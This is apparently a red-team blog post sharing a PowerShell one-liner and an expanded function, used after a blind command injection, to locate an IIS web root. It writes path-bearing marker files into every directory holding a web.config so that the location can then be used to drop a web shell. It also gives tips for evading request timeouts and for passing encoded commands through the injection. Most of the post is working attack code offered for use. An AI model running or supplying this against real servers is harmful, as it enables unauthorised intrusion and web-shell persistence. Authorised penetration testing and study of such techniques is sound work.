On a recent red team engagement, I came across a blind remote command execution on a web application. I needed to find the web root to write and upload a web shell. Why?

  • The web server's service account does not have administrative privileges
  • Outbound connection to the Internet is not available (no reverse shell)
  • Web root is in a custom and very hard to guess location

Anyway, here's a one-liner that works around these constraints. It enumerates every FileSystem drive on the host, searches each one recursively for web.config, and writes an out.txt into every directory that contains one, with the directory's local path as the file's contents. Since IIS sites and ASP.NET applications keep a web.config in their root, the directory that is actually the web root will then serve that file: request /out.txt over HTTP and the response tells you the path to drop the web shell into.

(Get-PSDrive -PSProvider FileSystem).Root | ForEach-Object {(Get-ChildItem -Path $_ -Filter "web.config" -File -Recurse -ErrorAction SilentlyContinue -Force).DirectoryName | ForEach-Object {Out-File -FilePath "$_\out.txt" -InputObject $_ -Force -ErrorAction SilentlyContinue}}

Change the value of -Filter "web.config" to your target file.
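The same technique expanded into a function, added here as an example and not taken from the original post or from Cache. It does what the one-liner does but with a marker name you choose (the default name below is an assumption; use a random one per engagement), skips directories you cannot write to without dying, reports each attempt, and can remove the markers again once you have your answer. The -Cleanup switch and the Find-WebRoot name are this example's own.

```powershell
# Added example: longer form of the web.config marker trick from the post above.
# Assumed names: Find-WebRoot, the -Cleanup switch and the default marker file name.
function Find-WebRoot {
    param(
        [string]$Filter  = 'web.config',        # file that marks a candidate web root
        [string]$Marker  = 'probe-7f3a9c.txt',  # assumed; pick an unguessable name per engagement
        [switch]$Cleanup                        # remove markers from an earlier run instead of writing
    )

    # Every FileSystem drive that actually exists (Get-PSDrive can list stale roots).
    $roots = (Get-PSDrive -PSProvider FileSystem).Root |
        Where-Object { Test-Path -LiteralPath $_ }

    # Directories holding a web.config. -File avoids matching a folder with that name;
    # -Force includes hidden items; errors from unreadable folders are swallowed.
    $candidates = foreach ($root in $roots) {
        Get-ChildItem -Path $root -Filter $Filter -File -Recurse -Force -ErrorAction SilentlyContinue |
            Select-Object -ExpandProperty DirectoryName -Unique
    }

    foreach ($dir in $candidates) {
        $target = Join-Path -Path $dir -ChildPath $Marker

        if ($Cleanup) {
            Remove-Item -LiteralPath $target -Force -ErrorAction SilentlyContinue
            continue
        }

        try {
            # The marker's body is the directory's own path, so fetching
            # http://target/<marker> confirms the directory is served AND reveals where it is.
            Set-Content -LiteralPath $target -Value $dir -Force -ErrorAction Stop
            [pscustomobject]@{ Directory = $dir; Marker = $target; Written = $true }
        } catch {
            # Access denied or read-only location: still a candidate, just not writable by us.
            [pscustomobject]@{ Directory = $dir; Marker = $target; Written = $false }
        }
    }
}

# Usage through the command injection (output is not visible in a blind RCE,
# which is why the marker file carries the path):
#   Find-WebRoot
# then request http://target/probe-7f3a9c.txt from your own machine;
# once the web root is known, remove the droppings:
#   Find-WebRoot -Cleanup
```

Two caveats a run in the field will hit. First, ASP.NET applications often carry additional web.config files in subfolders (Views, App_Data and the like), so you will write several markers; only the one reachable at the site's root URL matters, and its contents give you the physical path. Second, a recursive walk of every drive can easily outlast the HTTP request that carries your injected command, so if the injection point times out, launch the command detached (for example with Start-Process or Start-Job) and poll for the marker afterwards. Pasting a multi-line function through a one-shot injection is easiest with powershell -EncodedCommand.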

Added to Cache – https://github.com/crimsonlabs-io/Cache/blob/main/Attacker/scripts/FindWebroot.ps1